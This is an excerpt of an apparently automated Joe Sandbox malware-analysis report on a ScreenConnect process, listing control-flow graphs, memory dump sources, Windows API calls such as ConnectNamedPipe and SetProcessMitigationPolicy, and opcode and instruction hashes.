                                                                  • Opcode Fuzzy Hash: bcfe9ae3a7a5460e4b2eace1b78b699c1e5aeb8015144beff6f01f5a3b408b0a
                                                                  • Instruction Fuzzy Hash: C43122B58003099FDB10DF9AD888A8EBFF5BF48310F148069E918AB222C375A865CF50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 318 52c1e0c-52c1ea6 ConnectNamedPipe 321 52c1eaf-52c1ef1 318->321 322 52c1ea8-52c1eae 318->322 326 52c1efb 321->326 327 52c1ef3 321->327 322->321 328 52c1efc 326->328 327->326 328->328
                                                                  APIs
                                                                  • ConnectNamedPipe.KERNEL32(00000000), ref: 052C1E90
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2760337571.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_52c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ConnectNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2191148154-0
                                                                  • Opcode ID: f165e06dfde6bc9bec5331e182c77df9a7a5723bdee00228b4cdcfc6c89a7dc5
                                                                  • Instruction ID: 49b649432d4b62178087e821b96ccc9341115ae3c39e8b7a5f3dcf253a971498
                                                                  • Opcode Fuzzy Hash: f165e06dfde6bc9bec5331e182c77df9a7a5723bdee00228b4cdcfc6c89a7dc5
                                                                  • Instruction Fuzzy Hash: B4313471C102599FCB24DFAAC485B9EBFF5AF49600F1480ADE849AB352CB749801CFA0
                                                                  APIs
                                                                  • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 058A64DD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2762137579.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_58a0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: EnumProcesses
                                                                  • String ID:
                                                                  • API String ID: 84517404-0
                                                                  • Opcode ID: 754f4cc6eae5993279f1c52a772c66c85cfbc693bd8567996fa1d029317dce68
                                                                  • Instruction ID: 3447217ff35277664dbfe0ad354a7dbf7bbc9aea333d8b5d8580a7bb1bf50c49
                                                                  • Opcode Fuzzy Hash: 754f4cc6eae5993279f1c52a772c66c85cfbc693bd8567996fa1d029317dce68
                                                                  • Instruction Fuzzy Hash: F22139B2C013098FDB10DF9AC844B9EBBF4FB48210F54842DD919A7300D7789941CBA4

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 346 52c1e18-52c1ea6 ConnectNamedPipe 348 52c1eaf-52c1ef1 346->348 349 52c1ea8-52c1eae 346->349 353 52c1efb 348->353 354 52c1ef3 348->354 349->348 355 52c1efc 353->355 354->353 355->355
                                                                  APIs
                                                                  • ConnectNamedPipe.KERNEL32(00000000), ref: 052C1E90
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2760337571.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_52c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ConnectNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2191148154-0
                                                                  • Opcode ID: 6544ae9337980cff3e8c2dde16f7e909c9f1a7e0bf98d62bc8c3f4ea7e83e296
                                                                  • Instruction ID: 8a0ce20957d9f16ae9b22d43e86b24816141411de5a82216f8631a3fb11e0b79
                                                                  • Opcode Fuzzy Hash: 6544ae9337980cff3e8c2dde16f7e909c9f1a7e0bf98d62bc8c3f4ea7e83e296
                                                                  • Instruction Fuzzy Hash: 002113B0D102599FCB24DFAAC485B9EBFF5BF49610F24806EE849A7341DB759805CFA0
                                                                  APIs
                                                                  • WaitNamedPipeW.KERNEL32(00000000), ref: 052C5BCF
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2760337571.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_52c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipeWait
                                                                  • String ID:
                                                                  • API String ID: 3146367894-0
                                                                  • Opcode ID: 62287d93adf39f4c32ed0acaa3d2f1b2a94eb43063825c9d0923b3def9b01802
                                                                  • Instruction ID: a7af49ad48aac8e2f8a7055e6bf1f7aa6a3086319765e606f9b8bacc6d830319
                                                                  • Opcode Fuzzy Hash: 62287d93adf39f4c32ed0acaa3d2f1b2a94eb43063825c9d0923b3def9b01802
                                                                  • Instruction Fuzzy Hash: E52124B680030A8FCB14CF9AC444BEEBBF4BF88320F14846DD459A7241C779A545CFA1
                                                                  APIs
                                                                  • WaitNamedPipeW.KERNEL32(00000000), ref: 052C5BCF
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2760337571.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_52c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipeWait
                                                                  • String ID:
                                                                  • API String ID: 3146367894-0
                                                                  • Opcode ID: a66d6133cc497672dbd62dffdba1a6b8dd4bd73ae2284c30be1eeff5ceb1e196
                                                                  • Instruction ID: 5fbdb3c12e60b2b87d5cd8f96d554ef9f935c1abd65b3734f0fbe2de1bfc98b2
                                                                  • Opcode Fuzzy Hash: a66d6133cc497672dbd62dffdba1a6b8dd4bd73ae2284c30be1eeff5ceb1e196
                                                                  • Instruction Fuzzy Hash: 072102B690034A8FDB14CF9AC484BAEBBB5BF88310F14846ED559A7241C779A545CFA0
                                                                  APIs
                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 058A65BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2762137579.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_58a0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessSession
                                                                  • String ID:
                                                                  • API String ID: 3779259828-0
                                                                  • Opcode ID: 1888da70153673b0d849c5adc2a01bd5ea60771b90da923f12abeee39b1d06c5
                                                                  • Instruction ID: e21c2a2394c7bdfe7e94d05b7aaf22984c5942f2e28c63263d382288998a2e74
                                                                  • Opcode Fuzzy Hash: 1888da70153673b0d849c5adc2a01bd5ea60771b90da923f12abeee39b1d06c5
                                                                  • Instruction Fuzzy Hash: 031106B1C003099FDB10DF9AD844BDEBBF8FB88220F14842AD559A3640D779A545CFA1
                                                                  APIs
                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 058A65BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2762137579.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_58a0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessSession
                                                                  • String ID:
                                                                  • API String ID: 3779259828-0
                                                                  • Opcode ID: 24d220f9f427e0f726a93f4bc47d5a1f4cb2a57890baf01d82dce3a923f778aa
                                                                  • Instruction ID: e4ac1cbe4dd95811fb841eb38055d9271047744211273ec1007f7290b128336d
                                                                  • Opcode Fuzzy Hash: 24d220f9f427e0f726a93f4bc47d5a1f4cb2a57890baf01d82dce3a923f778aa
                                                                  • Instruction Fuzzy Hash: 901103B5C003498FDB20DF9AC44479EBBF4FB88224F148429D959A7240D779A945CFA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2729988883.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_101d000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b36547f205bbc6eb8d9620f6eff719961bfe575854005a397d6d5f9aa242bc8f
                                                                  • Instruction ID: cff1240c5d1439249eda0237232ecadee36f42a4ac14685248b4dfc5be924b87
                                                                  • Opcode Fuzzy Hash: b36547f205bbc6eb8d9620f6eff719961bfe575854005a397d6d5f9aa242bc8f
                                                                  • Instruction Fuzzy Hash: 50212875504340DFDB05DF54D9C8B1ABFA5FB88320F20C5A9E8490B25AC33AD456CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2729988883.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_101d000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                  • Instruction ID: 50ce8145de12294af4b45aaa84283cf8ece286c4e15e7db12cb67293bbbd523b
                                                                  • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                  • Instruction Fuzzy Hash: 1811D376504280CFCB16CF54D9C4B16BFB2FB88324F24C6A9D8490B25BC33AD456CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2729988883.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_101d000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b0e15b2ebaf1af88fdd8cb1af03b05b0fad569391eac122ae6d12ca5703b7194
                                                                  • Instruction ID: b21402d7522a876ba46a69f950a3faa7d3fbcd6778457ef8ea026f3f8675657a
                                                                  • Opcode Fuzzy Hash: b0e15b2ebaf1af88fdd8cb1af03b05b0fad569391eac122ae6d12ca5703b7194
                                                                  • Instruction Fuzzy Hash: 72012B714043049FE7115A59CCC8B67BFD8EF416A5F18C459FD884B186C37D9441C7B1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2729988883.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_101d000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5c6fd1674c74b975e0200e304927133f9b0ca35ac0033f69ddd1ad9530abec34
                                                                  • Instruction ID: 8170497670f79593a12f0a243690f49a79a101911d2a881fd185aba6acc817d7
                                                                  • Opcode Fuzzy Hash: 5c6fd1674c74b975e0200e304927133f9b0ca35ac0033f69ddd1ad9530abec34
                                                                  • Instruction Fuzzy Hash: DCF06271404344AEE7519A19CC88B62FFD8EB41674F28C55AFD884A286C279A845CBB1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2731028269.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_14e0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e16215fa0b18345b642ab2407a070fbe4dd1a2671e686e33f675e82e6d04762
                                                                  • Instruction ID: 0e70762bb593db2b6ff9dc90dd4128df328e1c984c1ed312f04ba4a93ae43493
                                                                  • Opcode Fuzzy Hash: 6e16215fa0b18345b642ab2407a070fbe4dd1a2671e686e33f675e82e6d04762
                                                                  • Instruction Fuzzy Hash: 45027E31E0065A9FCB05DFA8C8405DEFBF1FF99310B15C66AE405BB211EB35A986CB90

                                                                  Execution Graph

                                                                  Execution Coverage:11.2%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:3
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 13372 7ffb4a9e806a 13373 7ffb4a9e806f SetProcessMitigationPolicy 13372->13373 13375 7ffb4a9e8102 13373->13375

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 294 7ffb4acf5cb6-7ffb4acf5d14 call 7ffb4acf0c30 * 2 301 7ffb4acf5d1a-7ffb4acf5d28 294->301 302 7ffb4acf6aae-7ffb4acf6ac1 294->302 304 7ffb4acf5d2a-7ffb4acf5d2c 301->304 305 7ffb4acf5d2e-7ffb4acf5d3d call 7ffb4acf0e20 301->305 306 7ffb4acf5d40-7ffb4acf5d42 304->306 305->306 309 7ffb4acf5d48-7ffb4acf5d64 306->309 310 7ffb4acf5e82-7ffb4acf5e85 306->310 309->310 330 7ffb4acf5d6a-7ffb4acf5d7c 309->330 311 7ffb4acf5fc0-7ffb4acf5fc7 310->311 312 7ffb4acf5e8b-7ffb4acf5e96 310->312 313 7ffb4acf6057-7ffb4acf605e 311->313 314 7ffb4acf5fcd-7ffb4acf5fd4 311->314 316 7ffb4acf5e98-7ffb4acf5eb5 312->316 317 7ffb4acf5ee2-7ffb4acf5ef0 312->317 321 7ffb4acf6069-7ffb4acf607c 313->321 322 7ffb4acf6060-7ffb4acf6067 313->322 314->313 319 7ffb4acf5fda-7ffb4acf5fe4 314->319 324 7ffb4acf6acb-7ffb4acf6ad3 316->324 325 7ffb4acf5ebb-7ffb4acf5ee0 316->325 317->311 326 7ffb4acf60a6-7ffb4acf60ad 319->326 335 7ffb4acf5fea-7ffb4acf601f 319->335 339 7ffb4acf608d-7ffb4acf6095 321->339 340 7ffb4acf607e-7ffb4acf6083 321->340 322->321 322->326 343 7ffb4acf6ad4-7ffb4acf6adc 324->343 325->317 327 7ffb4acf60b3-7ffb4acf60ba 326->327 328 7ffb4acf6311-7ffb4acf6318 326->328 327->328 333 7ffb4acf60c0-7ffb4acf60c3 327->333 328->302 334 7ffb4acf631e-7ffb4acf6325 328->334 336 7ffb4acf5dca-7ffb4acf5dda 330->336 337 7ffb4acf5d7e-7ffb4acf5d9b 330->337 345 7ffb4acf60c5-7ffb4acf60c7 333->345 346 7ffb4acf60cc-7ffb4acf60da 333->346 334->302 347 7ffb4acf632b-7ffb4acf633d 334->347 335->343 355 7ffb4acf5da1-7ffb4acf5dc8 337->355 356 7ffb4acf6ac2-7ffb4acf6aca 337->356 341 7ffb4acf6b01-7ffb4acf6b66 339->341 342 7ffb4acf609b-7ffb4acf609f 339->342 340->339 442 7ffb4acf6b6d-7ffb4acf6b98 341->442 342->326 370 7ffb4acf6add-7ffb4acf6aee 343->370 351 7ffb4acf617a-7ffb4acf617d 345->351 367 7ffb4acf60de 346->367 368 7ffb4acf60dc 346->368 352 7ffb4acf6389-7ffb4acf639c 347->352 353 7ffb4acf633f-7ffb4acf634a 347->353 361 7ffb4acf6186-7ffb4acf6194 351->361 362 7ffb4acf617f-7ffb4acf6181 351->362 374 7ffb4acf63a3-7ffb4acf63ae 352->374 365 7ffb4acf630d 353->365 366 7ffb4acf634c-7ffb4acf635c 353->366 355->336 356->324 390 7ffb4acf6198 361->390 391 7ffb4acf6196 361->391 369 7ffb4acf6235-7ffb4acf623b 362->369 365->328 376 7ffb4acf6362-7ffb4acf6387 366->376 377 7ffb4acf6aef-7ffb4acf6b00 366->377 380 7ffb4acf60e0-7ffb4acf60e3 367->380 368->380 378 7ffb4acf6241-7ffb4acf6243 369->378 379 7ffb4acf62ed-7ffb4acf62ef 369->379 370->377 383 7ffb4acf63b4-7ffb4acf63cc 374->383 384 7ffb4acf6451-7ffb4acf6457 374->384 376->352 377->341 378->379 387 7ffb4acf6249-7ffb4acf627d 378->387 379->328 385 7ffb4acf62f1-7ffb4acf62f9 379->385 388 7ffb4acf60e5-7ffb4acf60eb 380->388 389 7ffb4acf60ed-7ffb4acf60f8 380->389 383->384 419 7ffb4acf63d2-7ffb4acf6445 383->419 384->302 398 7ffb4acf645d-7ffb4acf6465 384->398 385->328 392 7ffb4acf62fb-7ffb4acf630b 385->392 387->379 399 7ffb4acf6168-7ffb4acf6178 388->399 400 7ffb4acf60fa-7ffb4acf6117 389->400 401 7ffb4acf6144-7ffb4acf6165 389->401 395 7ffb4acf619a-7ffb4acf619d 390->395 391->395 392->365 408 7ffb4acf61a7-7ffb4acf61b2 395->408 409 7ffb4acf619f-7ffb4acf61a5 395->409 412 7ffb4acf6467-7ffb4acf64a6 398->412 413 7ffb4acf64ad-7ffb4acf64b5 398->413 399->351 400->370 414 7ffb4acf611d-7ffb4acf6142 400->414 401->399 417 7ffb4acf61b4-7ffb4acf61c0 408->417 418 7ffb4acf61fe-7ffb4acf6220 408->418 416 7ffb4acf6223-7ffb4acf6233 409->416 412->413 413->302 415 7ffb4acf64bb-7ffb4acf6534 413->415 414->401 454 7ffb4acf653a-7ffb4acf667c 415->454 455 7ffb4acf6aa1-7ffb4acf6aa8 415->455 416->369 418->416 452 7ffb4acf6b9a-7ffb4acf6b9d 442->452 453 7ffb4acf6b63-7ffb4acf6b66 442->453 456 7ffb4acf6b9f-7ffb4acf6ba3 452->456 453->442 484 7ffb4acf6683-7ffb4acf66c5 454->484 455->302 455->415 458 7ffb4acf6bab-7ffb4acf6bc8 456->458 464 7ffb4acf6b99-7ffb4acf6b9d 458->464 465 7ffb4acf6bca-7ffb4acf6bd1 458->465 464->456 465->458 487 7ffb4acf66c7-7ffb4acf671a 484->487 488 7ffb4acf671c-7ffb4acf671e 484->488 487->488 493 7ffb4acf6720-7ffb4acf6721 487->493 489 7ffb4acf6728-7ffb4acf6735 488->489 491 7ffb4acf6737-7ffb4acf674f 489->491 492 7ffb4acf676b 489->492 498 7ffb4acf6751-7ffb4acf6766 491->498 499 7ffb4acf676d 491->499 494 7ffb4acf676f-7ffb4acf6772 492->494 493->489 496 7ffb4acf6785-7ffb4acf6788 494->496 497 7ffb4acf6774-7ffb4acf6781 494->497 501 7ffb4acf678a-7ffb4acf678b 496->501 502 7ffb4acf6792-7ffb4acf67bb 496->502 497->496 503 7ffb4acf6783 497->503 498->484 499->494 501->502 508 7ffb4acf67c2-7ffb4acf6859 502->508 503->496 512 7ffb4acf685f-7ffb4acf6860 508->512 513 7ffb4acf685b-7ffb4acf685d 508->513 514 7ffb4acf6867-7ffb4acf6874 512->514 513->514 515 7ffb4acf68aa 514->515 516 7ffb4acf6876-7ffb4acf688e 514->516 517 7ffb4acf68ae-7ffb4acf68b1 515->517 521 7ffb4acf6890-7ffb4acf68a5 516->521 522 7ffb4acf68ac 516->522 519 7ffb4acf68b3-7ffb4acf68c0 517->519 520 7ffb4acf68c4-7ffb4acf68c7 517->520 519->520 526 7ffb4acf68c2 519->526 524 7ffb4acf68c9-7ffb4acf68ca 520->524 525 7ffb4acf68d1-7ffb4acf6924 call 7ffb4acf5560 520->525 521->508 522->517 524->525 525->455 526->520
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f3761aa44ee1f9e87cecc67cc22917e20ae33722314f360c02b190e7c1f991c8
                                                                  • Instruction ID: f4948f7b0e7a1947bbd02e9280d2ce452172704c9cae72b5f7bf763e00a04385
                                                                  • Opcode Fuzzy Hash: f3761aa44ee1f9e87cecc67cc22917e20ae33722314f360c02b190e7c1f991c8
                                                                  • Instruction Fuzzy Hash: A57202B1A0CA8A4BE7D8FF38C9956B577D1EFA8704F2441B9E44DC76C3DE28A8058741

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 700 7ffb4acf6d1d-7ffb4acf6d20 701 7ffb4acf6d22-7ffb4acf6d3e 700->701 702 7ffb4acf6d0c-7ffb4acf6d1b 700->702 706 7ffb4acf6d3f-7ffb4acf6d49 701->706 702->700 706->701 708 7ffb4acf6d4b 706->708 709 7ffb4acf6d4f-7ffb4acf6d50 708->709 709->706 710 7ffb4acf6d52-7ffb4acf6d60 709->710 710->709 712 7ffb4acf6d62-7ffb4acf6e1e 710->712 726 7ffb4acf6e1f-7ffb4acf6e44 712->726 730 7ffb4acf6e46-7ffb4acf6f4c 726->730 744 7ffb4acf6f96-7ffb4acf6f9c 730->744 745 7ffb4acf6f4e-7ffb4acf6f6a 730->745 748 7ffb4acf6fa3-7ffb4acf6fa6 744->748 746 7ffb4acf72ef-7ffb4acf730d call 7ffb4acf0c30 * 2 745->746 747 7ffb4acf6f70-7ffb4acf6f8e call 7ffb4acf0c30 * 2 745->747 763 7ffb4acf7419-7ffb4acf7424 746->763 764 7ffb4acf7313-7ffb4acf731a 746->764 765 7ffb4acf7185-7ffb4acf71a3 call 7ffb4acf0c30 * 2 747->765 766 7ffb4acf6f94-7ffb4acf6f95 747->766 751 7ffb4acf6fa8-7ffb4acf6faa 748->751 752 7ffb4acf6fac-7ffb4acf6fba call 7ffb4acf0e20 748->752 755 7ffb4acf6fbd-7ffb4acf6fd2 751->755 752->755 767 7ffb4acf6fd8-7ffb4acf6fe6 call 7ffb4acf0e20 755->767 768 7ffb4acf6fd4-7ffb4acf6fd6 755->768 769 7ffb4acf732d-7ffb4acf732f 764->769 770 7ffb4acf731c-7ffb4acf732b 764->770 785 7ffb4acf71a5-7ffb4acf71af 765->785 786 7ffb4acf71cd-7ffb4acf71eb call 7ffb4acf0c30 * 2 765->786 766->744 773 7ffb4acf6fe9-7ffb4acf6ff7 767->773 768->773 772 7ffb4acf7336-7ffb4acf7350 769->772 770->769 782 7ffb4acf7331 770->782 787 7ffb4acf7354-7ffb4acf735a 772->787 783 7ffb4acf6ff9-7ffb4acf6ffb 773->783 784 7ffb4acf6ffd-7ffb4acf700b call 7ffb4acf0e20 773->784 782->772 788 7ffb4acf700e-7ffb4acf700f 783->788 784->788 790 7ffb4acf71c3 785->790 791 7ffb4acf71b1-7ffb4acf71c1 785->791 809 7ffb4acf71f1-7ffb4acf71fc 786->809 810 7ffb4acf72a2-7ffb4acf72ad 786->810 792 7ffb4acf73a6-7ffb4acf73b4 787->792 793 7ffb4acf735c-7ffb4acf7379 787->793 801 7ffb4acf7016-7ffb4acf701b 788->801 797 7ffb4acf71c5-7ffb4acf71c6 790->797 791->797 792->763 792->787 802 7ffb4acf7425-7ffb4acf7497 793->802 803 7ffb4acf737f-7ffb4acf73a4 793->803 797->786 807 7ffb4acf7022-7ffb4acf7028 801->807 819 7ffb4acf7499-7ffb4acf74d1 802->819 820 7ffb4acf74e0-7ffb4acf7536 802->820 803->792 815 7ffb4acf702f-7ffb4acf7036 807->815 817 7ffb4acf7202-7ffb4acf7211 call 7ffb4acf0e20 809->817 818 7ffb4acf71fe-7ffb4acf7200 809->818 823 7ffb4acf72b3-7ffb4acf72c2 call 7ffb4acf0e20 810->823 824 7ffb4acf72af-7ffb4acf72b1 810->824 815->765 821 7ffb4acf703c-7ffb4acf7043 815->821 825 7ffb4acf7214-7ffb4acf724e 817->825 818->825 856 7ffb4acf7538-7ffb4acf7539 820->856 857 7ffb4acf753c-7ffb4acf7560 820->857 821->765 827 7ffb4acf7049-7ffb4acf7060 821->827 828 7ffb4acf72c5-7ffb4acf72c7 823->828 824->828 840 7ffb4acf7095-7ffb4acf70a0 827->840 841 7ffb4acf7062-7ffb4acf7074 827->841 828->763 830 7ffb4acf72cd-7ffb4acf72ee 828->830 853 7ffb4acf70a6-7ffb4acf70b5 call 7ffb4acf0e20 840->853 854 7ffb4acf70a2-7ffb4acf70a4 840->854 851 7ffb4acf707a-7ffb4acf7088 call 7ffb4acf0e20 841->851 852 7ffb4acf7076-7ffb4acf7078 841->852 858 7ffb4acf708b-7ffb4acf708e 851->858 852->858 860 7ffb4acf70b8-7ffb4acf70ba 853->860 854->860 856->857 869 7ffb4acf7592-7ffb4acf759b 857->869 870 7ffb4acf7562-7ffb4acf7571 857->870 858->840 862 7ffb4acf716f-7ffb4acf7181 860->862 863 7ffb4acf70c0-7ffb4acf70d7 860->863 862->765 863->862 874 7ffb4acf70dd-7ffb4acf70fa 863->874 872 7ffb4acf7577-7ffb4acf7591 870->872 873 7ffb4acf7573-7ffb4acf7574 870->873 873->872 879 7ffb4acf7106 874->879 880 7ffb4acf70fc-7ffb4acf7104 874->880 881 7ffb4acf7108-7ffb4acf710a 879->881 880->881 881->862 883 7ffb4acf710c-7ffb4acf7116 881->883 884 7ffb4acf7118-7ffb4acf7122 call 7ffb4acf1840 883->884 885 7ffb4acf7124-7ffb4acf712c 883->885 884->765 884->885 887 7ffb4acf715a-7ffb4acf716d call 7ffb4acf5820 885->887 888 7ffb4acf712e-7ffb4acf7153 call 7ffb4acf5688 885->888 887->765 888->887
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 994762cf19ffbdb4f36cee24105be7bdfd8776aed10b001bbf55cbc79bcfa826
                                                                  • Instruction ID: f666e603ddef405339e7092c31a77fd353248cfe4c98ac3de5a92515515a0ac8
                                                                  • Opcode Fuzzy Hash: 994762cf19ffbdb4f36cee24105be7bdfd8776aed10b001bbf55cbc79bcfa826
                                                                  • Instruction Fuzzy Hash: CB32F5E290DA864BE7D5FF78C9556BA2BD5EF98300F6440F9E08DC75C3ED29A8058381

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 63 7ffb4a9e806a-7ffb4a9e8100 SetProcessMitigationPolicy 66 7ffb4a9e8108-7ffb4a9e8137 63->66 67 7ffb4a9e8102 63->67 67->66
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2751248727.00007FFB4A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A9E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4a9e0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: MitigationPolicyProcess
                                                                  • String ID:
                                                                  • API String ID: 1088084561-0
                                                                  • Opcode ID: fb87ccee953d85d225d53fea2a47d6f44cac3965891f004197ef08264399e288
                                                                  • Instruction ID: 8122b9eaa1ff80684da491c9a87dc885492a08a225d40ed3fc4cea833f7c58ec
                                                                  • Opcode Fuzzy Hash: fb87ccee953d85d225d53fea2a47d6f44cac3965891f004197ef08264399e288
                                                                  • Instruction Fuzzy Hash: 7431957191CB188FDB28AF9DDC4A5F9BBE0EB65711F00412EE449D3252DB74A8458B81

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2751248727.00007FFB4A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A9E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4a9e0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: MitigationPolicyProcess
                                                                  • String ID:
                                                                  • API String ID: 1088084561-0
                                                                  • Opcode ID: 0c10a3d401468272ddc22f1e70990cd511fd31f7c478567bb38d093d1bed83ab
                                                                  • Instruction ID: c97b343de7e8ee7a94894a2fc7ad35a46c5ff29b423738cdcfd88ac63deb7d06
                                                                  • Opcode Fuzzy Hash: 0c10a3d401468272ddc22f1e70990cd511fd31f7c478567bb38d093d1bed83ab
                                                                  • Instruction Fuzzy Hash: 3221D77191CB188FDB28AF9CDC4A6F9B7E0EB55711F00412EE449D3252DB74B8458B81

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
